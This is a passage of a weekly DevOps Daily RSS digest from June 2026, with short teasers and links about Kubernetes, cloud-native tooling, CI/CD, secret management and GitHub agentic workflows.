      <description><![CDATA[⚡ Curated updates from Kubernetes, cloud native tooling, CI/CD, IaC, observability, and security - handpicked for DevOps professionals!]]></description>
      <pubDate>Mon, 15 Jun 2026 00:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/news/2026-week-25</guid>
      <category><![CDATA[DevOps News]]></category>
      <content:encoded><![CDATA[<blockquote>
<p>📌 <strong>Handpicked by DevOps Daily</strong> - Your weekly dose of curated DevOps news and updates!</p>
</blockquote>
<hr>
<h2 id="h2-kubernetes" class="group relative scroll-mt-24">
        <a href="#h2-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ⚓ Kubernetes
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-kubernetes"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-six-live-kubernetes-recommendations-aks-cilium-rate-limiting-and-more" class="group relative scroll-mt-24">
        <a href="#h3-six-live-kubernetes-recommendations-aks-cilium-rate-limiting-and-more" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Six Live Kubernetes Recommendations: AKS, Cilium, Rate Limiting, and More
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-six-live-kubernetes-recommendations-aks-cilium-rate-limiting-and-more"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>On June 10th, Engin and I ran a live workshop building an AKS cluster, an Azure Container Registry, and a random-cat web app from scratch in C#. This is the writeup, including the parts we didn’t get </p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/getting-started-aks-pulumi-csharp/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-spotlight-on-sig-storage" class="group relative scroll-mt-24">
        <a href="#h3-spotlight-on-sig-storage" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Spotlight on SIG Storage
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-spotlight-on-sig-storage"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In our ongoing SIG Spotlight series, we shine a light on the groups that keep the Kubernetes project moving forward. This time, we catch up with SIG Storage, the group responsible for persistent data,</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/06/15/sig-storage-spotlight-2026/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-agent-sandbox-with-lovable-with-jonathan-grahl" class="group relative scroll-mt-24">
        <a href="#h3-agent-sandbox-with-lovable-with-jonathan-grahl" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Agent Sandbox with Lovable, with Jonathan Grahl
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-agent-sandbox-with-lovable-with-jonathan-grahl"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In this episode we speak to Jonathan Grahl. Jonathan is the Team Lead of Infrastructure at Lovable where he oversees the platform stack the company runs on. We talked about Kubernetes, Sandboxes and C</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 Kubernetes Podcast</strong></p>
<p><a href="https://e780d51f-f115-44a6-8252-aed9216bb521.libsyn.com/agent-sandbox-with-lovable-with-jonathan-grahl"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-next-era-of-telco-clouds-get-open-infrastructure-choice-with-sylva-and-canonical-kubernetes" class="group relative scroll-mt-24">
        <a href="#h3-the-next-era-of-telco-clouds-get-open-infrastructure-choice-with-sylva-and-canonical-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The next era of telco clouds: get open infrastructure choice with Sylva and Canonical Kubernetes
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-next-era-of-telco-clouds-get-open-infrastructure-choice-with-sylva-and-canonical-kubernetes"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Achieving vendor neutrality in telco clouds requires an infrastructure layer that respects open standards, without wrapping them in rigid platform layers. By combining upstream alignment with up to 15</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/the-next-era-of-telco-clouds-get-open-infrastructure-choice-with-sylva-and-canonical-kubernetes"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-scylladb-operator-121-release-with-oracle-kubernetes-engine-oke-support" class="group relative scroll-mt-24">
        <a href="#h3-scylladb-operator-121-release-with-oracle-kubernetes-engine-oke-support" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 ScyllaDB Operator 1.21 Release — with Oracle Kubernetes Engine (OKE) Support
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-scylladb-operator-121-release-with-oracle-kubernetes-engine-oke-support"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Introducing Oracle Kubernetes Engine support, stronger TLS, and a lighter dependency footprint</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/06/10/scylladb-operator-1-21-release-with-oracle-kubernetes-engine-oke-support/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-solving-secret-sprawl-in-multi-account-kubernetes-with-external-secrets-operator" class="group relative scroll-mt-24">
        <a href="#h3-solving-secret-sprawl-in-multi-account-kubernetes-with-external-secrets-operator" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Solving secret sprawl in multi-account Kubernetes with External Secrets Operator
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-solving-secret-sprawl-in-multi-account-kubernetes-with-external-secrets-operator"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Infrastructure provisioning in Kubernetes has become increasingly automated, but secret management often remains a challenge as environments grow. Organizations commonly separate development, staging,</p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/09/solving-secret-sprawl-in-multi-account-kubernetes-with-external-secrets-operator/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-conflict-management-in-intent-based-networks" class="group relative scroll-mt-24">
        <a href="#h3-conflict-management-in-intent-based-networks" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Conflict management in intent-based networks
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-conflict-management-in-intent-based-networks"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The theme for TM Forum Digital Transformation World (DTW) Ignite 2026 in Copenhagen is &quot;The Future. Faster.&quot; As we move further into the decade, connectivity has evolved from a utility into the centra</p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/conflict-management-intent-based-networks"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cloud-native" class="group relative scroll-mt-24">
        <a href="#h2-cloud-native" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ☁️ Cloud Native
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-cloud-native"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-improving-arm64-support-in-cncf-projects-with-oci-credits" class="group relative scroll-mt-24">
        <a href="#h3-improving-arm64-support-in-cncf-projects-with-oci-credits" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Improving Arm64 support in CNCF projects with OCI credits
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-improving-arm64-support-in-cncf-projects-with-oci-credits"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In recent years, Arm64 has been taking the cloud service provider world by storm. Recent reports indicate that, as of the end of 2025, over 50% of new instances on AWS and over 33% on Azure...</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/15/improving-arm64-support-in-cncf-projects-with-oci-credits/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-introducing-verifiable-execution-in-dapr-118" class="group relative scroll-mt-24">
        <a href="#h3-introducing-verifiable-execution-in-dapr-118" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing Verifiable Execution in Dapr 1.18
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-introducing-verifiable-execution-in-dapr-118"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Bringing attestation, provenance, and tamper-evident execution history to workflows and AI agents For years, the cloud native ecosystem has focused on making distributed systems resilient. Application</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/11/introducing-verifiable-execution-in-dapr-1-18/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-docker-hardened-images-enhanced-vulnerability-scanning-with-docker-and-aikido" class="group relative scroll-mt-24">
        <a href="#h3-docker-hardened-images-enhanced-vulnerability-scanning-with-docker-and-aikido" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Docker Hardened Images enhanced vulnerability scanning with Docker and Aikido
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-docker-hardened-images-enhanced-vulnerability-scanning-with-docker-and-aikido"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Aikido now scans Docker Hardened Images (DHI) with built-in VEX support. Vulnerabilities that Docker has verified as non-exploitable drop out of the queue automatically, so developers spend their time</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/docker-hardened-images-enhanced-vulnerability-scanning-with-docker-and-aikido/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-better-together-amazon-eks-auto-mode-and-istio-ambient-mesh" class="group relative scroll-mt-24">
        <a href="#h3-better-together-amazon-eks-auto-mode-and-istio-ambient-mesh" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Better Together: Amazon EKS Auto Mode and Istio Ambient Mesh
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-better-together-amazon-eks-auto-mode-and-istio-ambient-mesh"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In this post, you will learn how Amazon EKS Auto Mode and Istio Ambient Mesh work together to automate infrastructure management while providing automatic mTLS-based service-to-service security, helpi</p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/better-together-amazon-eks-auto-mode-and-istio-ambient-mesh/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cicd" class="group relative scroll-mt-24">
        <a href="#h2-cicd" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔄 CI/CD
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-cicd"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-github-removes-pat-requirement-for-agentic-workflows" class="group relative scroll-mt-24">
        <a href="#h3-github-removes-pat-requirement-for-agentic-workflows" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitHub Removes PAT Requirement for Agentic Workflows
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-github-removes-pat-requirement-for-agentic-workflows"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>GitHub Agentic Workflows can now use GitHub Actions&#39; built-in GITHUB_TOKEN instead of a personal access token (PAT). That means developers no longer need to create, store, or rotate a PAT to run agent</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/github-removes-pat-requirement-for-agentic-workflows/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-we-made-github-copilot-cli-more-selective-about-delegation" class="group relative scroll-mt-24">
        <a href="#h3-how-we-made-github-copilot-cli-more-selective-about-delegation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How we made GitHub Copilot CLI more selective about delegation
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-how-we-made-github-copilot-cli-more-selective-about-delegation"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Better orchestration, fewer handoffs, faster progress, without a single new knob. The post How we made GitHub Copilot CLI more selective about delegation appeared first on The GitHub Blog.</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/ai-and-ml/how-we-made-github-copilot-cli-more-selective-about-delegation/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-securing-cicd-for-an-open-source-project-locking-down-dependencies" class="group relative scroll-mt-24">
        <a href="#h3-securing-cicd-for-an-open-source-project-locking-down-dependencies" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Securing CI/CD for an open source project: Locking down dependencies
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-securing-cicd-for-an-open-source-project-locking-down-dependencies"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Part two This is the second post in a three-part series on how Cilium hardens its CI/CD pipeline. Part 1 covered access control: who can trigger builds and what code CI is allowed to execute. This...</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/12/securing-ci-cd-for-an-open-source-project-locking-down-dependencies/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-github-availability-report-may-2026" class="group relative scroll-mt-24">
        <a href="#h3-github-availability-report-may-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitHub availability report: May 2026
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-github-availability-report-may-2026"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In May, we experienced nine incidents that resulted in degraded performance across GitHub services. The post GitHub availability report: May 2026 appeared first on The GitHub Blog.</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/news-insights/company-news/github-availability-report-may-2026/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-speed-isnt-the-risk-lack-of-control-is" class="group relative scroll-mt-24">
        <a href="#h3-speed-isnt-the-risk-lack-of-control-is" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Speed isn't the risk. Lack of control is.
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-speed-isnt-the-risk-lack-of-control-is"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Why controlling code and agents in the AI era matters—and why we built AgentControl.</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 LaunchDarkly Blog</strong></p>
<p><a href="https://launchdarkly.com/blog/speed-isnt-the-risk-lack-of-control-is/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-making-secret-scanning-more-trustworthy-reducing-false-positives-at-scale" class="group relative scroll-mt-24">
        <a href="#h3-making-secret-scanning-more-trustworthy-reducing-false-positives-at-scale" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Making secret scanning more trustworthy: Reducing false positives at scale
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-making-secret-scanning-more-trustworthy-reducing-false-positives-at-scale"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Alerts are more trustworthy and actionable when noise is reduced. See how we improved the verification step with context-aware LLM reasoning. The post Making secret scanning more trustworthy: Reducing</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/security/making-secret-scanning-more-trustworthy-reducing-false-positives-at-scale/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitlab-patch-release-1902-18115-18108" class="group relative scroll-mt-24">
        <a href="#h3-gitlab-patch-release-1902-18115-18108" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitLab Patch Release: 19.0.2, 18.11.5, 18.10.8
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-gitlab-patch-release-1902-18115-18108"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p><strong>📅 Jun 11, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://docs.gitlab.com/releases/patches/patch-release-gitlab-19-0-2-released/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-give-github-copilot-cli-real-code-intelligence-with-language-servers" class="group relative scroll-mt-24">
